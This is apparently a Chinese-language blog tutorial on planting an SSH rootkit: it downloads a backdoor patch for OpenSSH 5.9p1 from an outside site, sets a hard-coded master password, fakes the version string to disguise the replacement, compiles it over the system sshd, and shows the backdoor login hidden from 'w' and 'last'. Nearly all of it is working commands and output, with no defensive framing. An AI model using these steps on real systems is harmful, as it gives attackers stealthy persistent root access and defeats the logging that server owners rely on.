ssh rookit

发表于 | 分类于 |

下载源码和后门

1
2
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz

解压

1
2
tar -zxvf openssh-5.9p1.tar.gz
tar -zxvf     0x06-openssh-5.9p1.patch.tar.gz

patch

1
2
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
patch < sshbd5.9p1.diff

vim includes.h 修改密码SECRETPW

1
2
3
#define ILOG "/tmp/ilog"
#define OLOG "/tmp/olog"
#define SECRETPW "alibaba"

vi inculdes.h 修改ssh版本(原来的)

1
2
#define SSH_VERSION     "OpenSSH_6.6.1p1, OpenSSL 1.0.1e-fips 11 Feb 2013"
#define SSH_PORTABLE    "p1"

编译准备

1
yum install -y openssl openssl-devel pam-devel

编译

1
2
3
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make
make install

有时有权限问题

1
chmod 600 /etc/ssh/*

重启服务

1
2
3
4
5
# centos7
systemctl restart sshd.service

### 旧版本
service ssh restart

用设置的密码登陆

可以看到不显示登陆状态
last 也没有记录

1
2
3
4
5
6
7
8
9
root@kali:~# ssh 192.168.50.129
[email protected]'s password:
Last failed login: Fri Nov 11 18:46:59 PST 2016 from 192.168.50.128 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Fri Nov 11 17:56:00 2016
[root@bogon ~]# w
 18:50:09 up 1 min,  1 user,  load average: 1.16, 0.43, 0.15
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
[root@bogon ~]#

但是会显示端口 ¥%&*#%¥#……

1
2
3
4
5
6
7
8
9
10
11
12
[root@bogon ~]# netstat -tna
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.168.122.1:53        0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 192.168.50.129:22       192.168.50.128:39240    ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:631                 :::*                    LISTEN
tcp6       0      0 ::1:25                  :::*                    LISTEN
[root@bogon ~]#

正常账号登陆显示已登陆

1
2
3
4
5
6
7
8
9
10
root@kali:~# ssh 192.168.50.129
[email protected]'s password:
Last failed login: Fri Nov 11 18:46:59 PST 2016 from 192.168.50.128 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Fri Nov 11 17:56:00 2016
[root@bogon ~]# w
 18:53:50 up 4 min,  2 users,  load average: 0.43, 0.29, 0.15
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    192.168.50.128   18:53    4.00s  0.04s  0.02s w
[root@bogon ~]#
打赏
0%